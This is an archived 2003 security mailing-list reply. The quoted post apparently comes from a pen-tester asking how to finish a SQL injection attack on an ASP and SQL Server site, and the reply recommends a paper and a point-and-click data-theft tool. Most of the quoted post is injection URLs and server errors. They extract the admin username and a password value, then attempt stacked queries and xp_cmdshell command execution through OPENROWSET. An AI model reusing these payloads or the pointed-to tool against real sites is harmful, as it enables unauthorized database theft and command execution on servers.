Re: SQL Injection ASP + SQL Server (problem) ?!

Thu, 31 Jul 2003 22:03:45 -0700 

Hi.

Take a look a this paper:
http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

also this tool, you only have to copy, paste and click
and you get all the data you want:
http://www.appsecinc.com/resources/freetools/DataThief.zip



Cesar.

--- [EMAIL PROTECTED] wrote:
> Hi,
> 
> I'm doing a pen-test in a WebServer running Win2K +
> IIS + ASP + SQL
> Server (filtred for internet connections).
> 
> The IIS appear to be very well patched. I'm trying
> SQL Injection. :)
> 
> I found a bug in ASP Script... see:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
> 
> I received the name of the min(user) in users
> tables, see:
> 
> Technical Information (for support personnel)
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Syntax error converting
> the nvarchar value 'admin' to a column of data type
> int.
> 
> The username is "admin". Now i want to know the
> password of "admin" i
> tryed:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
> 
> But i received it:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80004005)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Subquery returned more
> than 1 value. This is not permitted when the
> subquery follows =, !=,
> <, <= , >, >= or when the subquery is used as an
> expression.
> 
> 1 - Someone know how to do it return more than 1
> value ?? can give-me
> a example ?
> 
> I tryed it too:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
> 
> And i receive it:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Syntax error converting
> the varchar value
>
'{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}'
> to a column of data type int.
> 
> 2 - But it isn't a "password", it appear be a
> registry key. Someone
> know what is it ?? And how to do it work and see the
> password ? :)
> 
> 3 - I tryed to create a SQL Transaction like this:
> 
>
http://www.server.com/portal/index.asp?local=read&id_noticia=";[EMAIL 
PROTECTED](8000)[EMAIL PROTECTED]':'[EMAIL 
PROTECTED]@ret+'%20+user+'/'+senha%20from%20users%20where%20user>@[EMAIL PROTECTED]
> 
> I receive it:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The
> identifier that
> starts with '; begin declare @ret varchar(8000) set
> @ret=':' select
> @[EMAIL PROTECTED] '  user '/' senha from users where
> user>@ret select @ret
> as' is too long. Maximum length is 128.
> 
> Someone know why i received this error ?? I
> overfflowed the sized
> allowed in paramter by variable in ASP ? or in SQL
> Server ? How to do
> it work ?? :)
> 
> 4 - My last doubt. I tryed execute commands with
> xp_cmdshell.. see:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--
> 
> and receive:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Unclosed quotation mark
> before the character string ';EXEC
> master..xp_cmdshell(cmd.exe /c)--'.
> 
> 
> OR:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> 1: Incorrect
> syntax near ';EXEC master.dbo.xp_cmdshell'.
> 
> OR using quotes:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> 1: Incorrect
> syntax near '`'.
> 
> 
> And tryed too (use the bug to exec xp_cmdshell
> stored procedure with a
> non privilegied user):
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=";;(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
> 
> I receive ... again the error:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The
> identifier that
> starts with ';(SELECT * FROM
>
OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
> FMTONLY OFF execute master..xp_cmdshell' is too
> long. Maximum length
> is 128.
> 
> 
> If i try:
> 
>
http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
> 
> I receive:
> 
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Could
> not create an
> instance of OLE DB provider 'SQLOLEDB'.
> 
> What i'm doing wrong ?? How to do it work ??
> 
> Thkz a lot.
> 
> Best Regards.
> 
> [ ]'s
> 
>
---------------------------------------------------------------------------
>
----------------------------------------------------------------------------
> 


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com

---------------------------------------------------------------------------
----------------------------------------------------------------------------

Reply via email to